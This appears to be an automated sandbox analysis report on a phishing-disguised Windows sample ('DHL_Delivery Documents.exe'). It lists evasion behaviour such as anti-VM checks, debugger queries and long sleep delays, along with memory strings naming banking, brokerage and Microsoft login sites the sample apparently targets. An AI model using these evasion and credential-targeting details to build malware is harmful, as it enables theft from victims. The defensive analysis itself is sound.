            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: YybGLWQSx.exe PID: 7204, type: MEMORYSTR
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeMemory allocated: 2BD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeMemory allocated: 2E30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeMemory allocated: 2C70000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeMemory allocated: 6450000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeMemory allocated: 7450000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeMemory allocated: 7590000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeMemory allocated: 8590000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeMemory allocated: 760000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeMemory allocated: 2480000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeMemory allocated: 22B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeMemory allocated: 5A50000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeMemory allocated: 6A50000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeMemory allocated: 6B90000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeMemory allocated: 7B90000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C5096E rdtsc 8_2_01C5096E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8301Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1340Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8762Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 946Jump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeAPI coverage: 0.7 %
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeAPI coverage: 0.2 %
            Source: C:\Windows\SysWOW64\setx.exeAPI coverage: 2.6 %
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe TID: 2568Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1276Thread sleep time: -9223372036854770s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6768Thread sleep count: 8762 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6608Thread sleep count: 946 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6340Thread sleep time: -11990383647911201s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe TID: 7236Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\setx.exe TID: 7972Thread sleep count: 47 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\setx.exe TID: 7972Thread sleep time: -94000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe TID: 8040Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\setx.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\setx.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\setx.exeCode function: 18_2_0042BF20 FindFirstFileW,FindNextFileW,FindClose,18_2_0042BF20
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: setx.exe, 00000012.00000002.3282665980.00000000075E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rs.comVMware20,1
            Source: y11J94u5t.18.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: setx.exe, 00000012.00000002.3282665980.00000000075E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: azure.comVMware20,116964286
            Source: y11J94u5t.18.drBinary or memory string: discord.comVMware20,11696428655f
            Source: y11J94u5t.18.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: y11J94u5t.18.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: y11J94u5t.18.drBinary or memory string: global block list test formVMware20,11696428655
            Source: y11J94u5t.18.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: y11J94u5t.18.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: y11J94u5t.18.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: y11J94u5t.18.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: setx.exe, 00000012.00000002.3282665980.00000000075E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: date_createdINTEGERazure.comVMware20,116964286
            Source: y11J94u5t.18.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: y11J94u5t.18.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: y11J94u5t.18.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: y11J94u5t.18.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: y11J94u5t.18.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: y11J94u5t.18.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000013.00000002.3279541327.00000000008BF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.2999530343.000001618DA8F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: y11J94u5t.18.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: y11J94u5t.18.drBinary or memory string: outlook.office.comVMware20,11696428655s
            Source: y11J94u5t.18.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: y11J94u5t.18.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: y11J94u5t.18.drBinary or memory string: AMC password management pageVMware20,11696428655
            Source: y11J94u5t.18.drBinary or memory string: tasks.office.comVMware20,11696428655o
            Source: y11J94u5t.18.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: y11J94u5t.18.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: y11J94u5t.18.drBinary or memory string: interactivebrokers.comVMware20,11696428655
            Source: y11J94u5t.18.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: y11J94u5t.18.drBinary or memory string: dev.azure.comVMware20,11696428655j
            Source: y11J94u5t.18.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: y11J94u5t.18.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: y11J94u5t.18.drBinary or memory string: bankofamerica.comVMware20,11696428655x
            Source: setx.exe, 00000012.00000002.3278866707.000000000065E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc(KIM
            Source: y11J94u5t.18.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: y11J94u5t.18.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\setx.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C5096E rdtsc 8_2_01C5096E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_004179A3 LdrLoadDll,8_2_004179A3
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CD61C3 mov eax, dword ptr fs:[00000030h]8_2_01CD61C3
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CD61C3 mov eax, dword ptr fs:[00000030h]8_2_01CD61C3
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C8E1D0 mov eax, dword ptr fs:[00000030h]8_2_01C8E1D0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C8E1D0 mov eax, dword ptr fs:[00000030h]8_2_01C8E1D0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C8E1D0 mov ecx, dword ptr fs:[00000030h]8_2_01C8E1D0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C8E1D0 mov eax, dword ptr fs:[00000030h]8_2_01C8E1D0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C8E1D0 mov eax, dword ptr fs:[00000030h]8_2_01C8E1D0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CE61E5 mov eax, dword ptr fs:[00000030h]8_2_01CE61E5
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C401F8 mov eax, dword ptr fs:[00000030h]8_2_01C401F8
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C50185 mov eax, dword ptr fs:[00000030h]8_2_01C50185
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CCC188 mov eax, dword ptr fs:[00000030h]8_2_01CCC188
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CCC188 mov eax, dword ptr fs:[00000030h]8_2_01CCC188
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CB4180 mov eax, dword ptr fs:[00000030h]8_2_01CB4180
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CB4180 mov eax, dword ptr fs:[00000030h]8_2_01CB4180
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C9019F mov eax, dword ptr fs:[00000030h]8_2_01C9019F
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C9019F mov eax, dword ptr fs:[00000030h]8_2_01C9019F
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C9019F mov eax, dword ptr fs:[00000030h]8_2_01C9019F
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C9019F mov eax, dword ptr fs:[00000030h]8_2_01C9019F
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C0A197 mov eax, dword ptr fs:[00000030h]8_2_01C0A197
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C0A197 mov eax, dword ptr fs:[00000030h]8_2_01C0A197
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C0A197 mov eax, dword ptr fs:[00000030h]8_2_01C0A197
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CA4144 mov eax, dword ptr fs:[00000030h]8_2_01CA4144
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CA4144 mov eax, dword ptr fs:[00000030h]8_2_01CA4144
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CA4144 mov ecx, dword ptr fs:[00000030h]8_2_01CA4144
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CA4144 mov eax, dword ptr fs:[00000030h]8_2_01CA4144
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CA4144 mov eax, dword ptr fs:[00000030h]8_2_01CA4144
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CA8158 mov eax, dword ptr fs:[00000030h]8_2_01CA8158
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C16154 mov eax, dword ptr fs:[00000030h]8_2_01C16154
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C16154 mov eax, dword ptr fs:[00000030h]8_2_01C16154
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C0C156 mov eax, dword ptr fs:[00000030h]8_2_01C0C156
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CE4164 mov eax, dword ptr fs:[00000030h]8_2_01CE4164
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CE4164 mov eax, dword ptr fs:[00000030h]8_2_01CE4164
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CBE10E mov eax, dword ptr fs:[00000030h]8_2_01CBE10E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CBE10E mov ecx, dword ptr fs:[00000030h]8_2_01CBE10E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CBE10E mov eax, dword ptr fs:[00000030h]8_2_01CBE10E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CBE10E mov eax, dword ptr fs:[00000030h]8_2_01CBE10E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CBE10E mov ecx, dword ptr fs:[00000030h]8_2_01CBE10E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CBE10E mov eax, dword ptr fs:[00000030h]8_2_01CBE10E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CBE10E mov eax, dword ptr fs:[00000030h]8_2_01CBE10E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CBE10E mov ecx, dword ptr fs:[00000030h]8_2_01CBE10E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CBE10E mov eax, dword ptr fs:[00000030h]8_2_01CBE10E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CBE10E mov ecx, dword ptr fs:[00000030h]8_2_01CBE10E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CBA118 mov ecx, dword ptr fs:[00000030h]8_2_01CBA118
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CBA118 mov eax, dword ptr fs:[00000030h]8_2_01CBA118
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CBA118 mov eax, dword ptr fs:[00000030h]8_2_01CBA118
